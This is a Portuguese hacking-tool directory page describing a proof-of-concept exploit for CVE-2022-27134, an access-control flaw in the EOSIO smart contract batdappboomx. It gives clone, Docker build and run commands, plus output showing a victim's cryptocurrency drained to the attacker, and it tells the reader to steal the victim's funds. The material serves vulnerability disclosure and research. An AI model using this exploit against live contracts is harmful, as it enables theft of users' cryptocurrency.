Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-batdappboomx — CVE-2022-27134 | Kitploit
Ferramentas/GitHubGitHub/kenun99/cve-batdappboomx
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubkenun99/cve-batdappboomx

CVE-batdappboomx

CVE-2022-27134

Ver Repositório
1há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE ID

CVE-2022-27134

PRODUTO

batdappboomx é um contrato inteligente público executado na blockchain EOSIO. Este contrato inteligente recompensa criptomoeda aos seus participantes se eles pagarem alguma criptomoeda antes.

Versão

A versão mais recente deste contrato inteligente. O código hash sha256 do contrato inteligente é 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 Verifique-o no explorador de blockchain https://bloks.io/account/batdappboomx.

TIPO DE PROBLEMA

vulnerabilidade de controle de acesso

DESCRIÇÃO

batdappboomx não é open-source, mas encontramos uma vulnerabilidade com WASAI. Atacantes podem entrar neste jogo sem pagar nada.

  1. ative o ambiente
root@kitploit:~
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm  --network host -it localhost/client-eos:eos
  1. ataque a vítima e roube sua criptomoeda, ou seja,
Baixar ferramenta
EOS
root@kitploit:~
info  2022-03-11T14:28:53.345 keosd     wallet_plugin.cpp:38          plugin_initialize    ]
...
warn  2022-03-11T14:28:53.355 keosd     wallet.cpp:218                save_wallet_file     ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00

[+] Attacked successfully. Got more cryptocurrency.